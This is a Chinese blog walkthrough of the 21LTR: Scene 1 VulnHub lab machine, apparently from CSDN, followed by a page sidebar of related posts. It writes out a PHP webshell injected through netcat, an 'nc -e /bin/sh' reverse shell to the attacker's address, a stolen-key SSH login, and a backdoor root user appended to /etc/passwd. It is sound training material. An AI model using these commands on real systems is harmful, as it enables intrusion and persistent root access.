Hack the 21LTR: Scene 1

最新推荐文章于 2024-08-27 16:29:55 发布
最新推荐文章于 2024-08-27 16:29:55 发布
阅读量257 收藏 4
点赞数 6
文章标签: android 服务器 linux 运维 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53626662/article/details/141221870
版权

一、主机发现

是默认ip192.168.2.120,攻击机和靶机的网卡都设置成2段的仅主机模式

二、信息收集

1.访问首页

2.右击查看源码,显示账户名密码logs:zg]E-b0]+8:(58G

3.使用ftp连接

ftp 192.168.2.120

ls查看有什么文件

将backup_log.php下载到本机并查看

get backup_log.php
cat backup_log.php

4.拼接/logs,无果

5.拼接/logs/backup_log.php

6.启动netcat会话

nc -nv 192.168.2.120 10001 //失败就多试几次
<?php system($_GET['cmd']) ?>

拼接?cmd=id,有回显

三、信息利用

1.设置监听

nc -e /bin/sh 192.168.2.128 7788

靶机开启监听

监听成功

2.获得交互式shell

python -c 'import pty; pty.spawn("/bin/sh")'

3.查看文件

cd /media/USB_1/Stuff/Keys
ls
cat authorized_keys    #发现是hbeale用户

4.查看密钥文件

5.查看用户文件,有hbeale用户

6.ssh连接尝试

ssh -i id_rsa hbeale@192.168.2.120

四、提权

1.利用passwd文件可写进行提权

创建加密密码

openssl passwd 123456

将新用户加入passwd文件

echo 'wow:$1$5kDHZEko$.3eRHPAoXC2fPH2q/kaT50:0:0:root:/root:/bin/bash' >> /etc/passwd

然后cat查看/etc/passwd,成功创建

2.切换到刚刚创建的用户,提权成功

蓝天模糊
关注
  • 6
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
zf0 hack
08-26 20万+
  _/_/_/_/_/ 444444444 ~~~~~~ _/ _/_/ _/ _/_/ _/_/ 4;;;;;;;;4 Internet Superheroes ~ _/
LQG-LTR:精馏塔多变量控制中的LqG/LTR方法-matlab开发
05-30
1. 精馏塔过程的数学模型,通常用状态空间形式表示。 2. Kalman滤波器的实现,用于估计系统的不确定状态。 3. LQG控制器的设计,包括权重矩阵的选择,以优化特定的性能指标。 4. 李雅普诺夫函数的构造和分析,确保...
Hack the 21LTR: Scene 1 VM (Boot to Root)
marcushbs的博客
08-21 402
靶机下载链接: https://www.vulnhub.com/entry/21ltr-scene-1,3/ 主机扫描: ╰─ nmap -p1-65535 -sV -sC -A 192.168.2.120 Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-28 11:19 CSTNmap scan report for 192.168.2.120Host is up (0.0012s latency).Not shown: 65532 ...
Hack the 21LTR: Scene 1 靶机
hqy250019的博客
07-30 370
在端口 10001 上启动了一个 netcat 会话,我们得到了一个空白的 shell。cmd=id,尝试运行 id命令,发现得到回复。创建root权限的新用户和密码,将自动生成的hash值加入/etc/passwd。将文件下载到我们的本地系统后,我们使用 cat 命令在kali中打开该文件。发现扫描都没有,右键查看源代码,获得了一些登录凭据。ls,发现一个backup_log.php文件。在网站路径上拼接/logs/,发现访问被拒绝。再尝试ftp连接,发现连接成功。尝试ssh连接,发现连接失败。
21LTR: Scene 1靶机
m0_61995767的博客
07-30 566
21LTR: Scene 1打靶记录
【vulnhub】Hack the 21LTR: Scene 1 靶机
wbplife的博客
08-11 372
然后将root用户的密码写入1.txt,然后开始破解,但是连接的时候,还是连接不上,应该是配置原因,那么只能写入高权限用户了。尝试拼接到刚才目录扫描的目录的logs目录下,发现可以访问到日志文件/logs/backup_log.php。可以通过cat提权,所以可以看/etc/shadow文件,或者写入文件,选择读取shadow文件,破解密码。尝试ssh连接没成功,但是ftp连接成功了,ls查看,发现只有一个文件。尝试在日志文件写入木马,参考了一下其他文档,需要利用10001端口。赋予权限,然后ssh登录。
Vulnhub靶机渗透之21LTRvunlhub
2301_77039831的博客
10-17 260
到这里有两种思路,因为可以通过root的cat命令读取文件,所以可以看/etc/shadow,也可以写入该文件。由于是php的日志所以思路是想办法把一句话写入这个页面,看了下其他大佬的WP,得访问10001端口。接下来是方法二,因为可以读取shadow文件,所以试图将root的shadow文件的密码进行破解。连接后看下敏感文件,结合靶机有ssh服务,尝试读取密钥,发现可以读取。先创建一个文件,内容是root的加密密码,然后使用john解密。先nmap扫一下,发现有21,22,80端口。
第一章 Kali与靶机系统
Evil_invisible的博客
01-08 4115
目录 1.1 Kali 的简介 1.2 Kali的功能 1.3 Kali的安装 1.4 Kali的设置 1.4.1 Kali 网络设置 1. 有线网络设置 2. 无线网络设置 1.4.2 服务设置 1. VMware服务设置 2. Kali服务设置 1.5 靶机系统的介绍 1.1 Kali 的简介 Kali 是一个基于Debian的Linux发行版 Kali预装了大量安...
如何转换高度:0; 达到高度:自动; 使用CSS?
asdfgh0077的博客
12-24 1866
我正在尝试使用CSS过渡使<ul>滑落。 <ul>从height: 0; 。 悬停时,将高度设置为height:auto; 。 但是,这导致它只是显示而不是过
android.view;
lifeqiuzhi521的博客
06-24 1562
/* * Copyright (C) 2006 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * Yo...
panel-navigation-rtl-ltr:带有RTL支持的精美面板导航
05-11
标题 "panel-navigation-rtl-ltr:带有RTL支持的精美面板导航" 暗示了这是一个设计用于后台管理界面(admin dashboard)的导航组件,它具备右到左(RTL)和左到右(LTR)的语言布局支持。这在处理多语言网站或者需要...
ltr-tools:一套用于学习排名的命令行工具
05-19
该项目同时包含ltr-tools cli和solr配置,以提供后端搜索功能。 该项目的主要范围将是提供有用的工具,以帮助“学习排名”集成和开发。 ltr-tools是一个命令行界面,用于运行一组实用程序任务,以可视化,调试和...
LtR-Feature-Extractor:学习排名特征提取任务
04-28
《LtR特征提取器:深度探索学习排名与信息检索》 在信息检索(IR)领域,学习排名(Learning-to-Rank, LTR)是一种至关重要的技术,它通过机器学习方法来优化文档排序,以提高搜索结果的相关性。LtR特征提取器就是...
S905X3安卓9.0 安卓11 手柄驱动 调试命令 ampere:/ $ getevent -ltr add device 1
06-14
标题中的"S905X3安卓9.0 安卓11 手柄驱动"指的是基于Amlogic S905X3芯片的设备在运行Android 9.0或Android 11操作系统时的手柄驱动程序。S905X3是一款常见的应用于智能电视盒和流媒体设备的系统级芯片。...
一道关于php文件包含的CTF题
最新发布
m0_62903168的博客
08-27 1724
这是index.php的页面。点击login后会发现url里多了action的参数,那么我们就可以通过它来获取源码。?再通过base64的解码可以查看源码。
Android 应用中广播权限未指定风险与解决方案
weixin_37600397的博客
08-23 1566
Android应用中,广播(Broadcast)是一种重要的通信机制,应用可以通过广播与系统或其他应用进行通信。然而,如果在发送广播时未指定接收者的权限,可能会导致应用暴露于安全风险之下。未授权的接收者可能会拦截这些广播,甚至可能执行恶意操作。 在安全检查中,发现了一个问题:应用存在“Receiver权限未指定风险”。这个问题主要涉及广播发送时未指定接收者权限,可能导致广播被未授权的应用接收,进而可能造成数据泄露或其他安全问题。
upload-labs(Pass-18 ~ Pass-21)
m0_64849639的博客
08-23 1036
所以我们只要上传的文件后缀不是白名单中的,该文件就还是会被删除2、思路:由于该文件后缀不是白名单中的,该文件就还是会被删除;但是,服务器删除该php文件是有一定的延迟的,若我们在这延迟中访问了该php代码,那么就会在当前目录生成shell.php文件3、实践:(1)、抓包进入爆破模块:(2)发包:此时就在源源不断的上传文件1.php,服务器也在一直删除该文件;
Android 关于设备定屏/黑屏/冻屏/ANR那些事
sinat_37429535的博客
08-23 1052
再去上报至WMS进行窗口状态的切换,避免主Surface绘制完成上报至WMS后、同时SurfaceView迟迟没有绘制完成使得startingWindow过早移除从而产生黑屏的现象.主要作用为提供ViewRootImpl与SurfaceView(假如窗口存在SurfaceView的情况下)同步服务,实现在主Surface与SurfaceView均完成绘制时,现象分析:桌面的状态时黑屏的,但是SystemUI的statusBar是显示和功能都是正常的,那一般就是当前app的问题了.
ProtDec-LTR:学习排序提升蛋白质远程同源性检测
论文作者Bin Liu、Junjie Chen和Xiaolong Wang提出了一种名为ProtDec-LTR(Protein Decoder with Learning to Rank)的新方法。这种方法结合了学习排名的策略,目的是通过优化现有技术的组合来提高预测的准确性。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值